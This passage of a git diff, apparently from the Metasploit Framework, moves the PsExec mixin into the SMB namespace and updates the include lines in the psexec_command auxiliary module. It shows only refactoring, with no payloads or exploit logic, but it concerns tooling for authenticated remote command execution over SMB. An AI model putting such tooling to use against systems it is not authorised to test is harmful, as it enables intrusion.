OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', 'WORKGROUP']), + ], Msf::Exploit::Remote::SMB::Authenticated) + end +end + +end diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb similarity index 97% rename from lib/msf/core/exploit/psexec.rb rename to lib/msf/core/exploit/smb/psexec.rb index 58e678869595..3ba505c6cf93 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/smb/psexec.rb @@ -1,3 +1,4 @@ +# -*- coding: binary -*- require 'msf/core' require 'msf/core/exploit/dcerpc' 
@@ -11,10 +12,10 @@ module Msf # and runing a binary. #### -module Exploit::Remote::Psexec +module Exploit::Remote::SMB::Psexec include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::SMB::Authenticated # Retrives output from the executed command # diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 15e51b112e3f..54be82308fb8 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -5,9 +5,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC - include Msf::Exploit::Remote::SMB - include Msf::Exploit::Remote::SMB::Authenticated - include Msf::Exploit::Remote::Psexec + include Msf::Exploit::Remote::SMB::Psexec include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner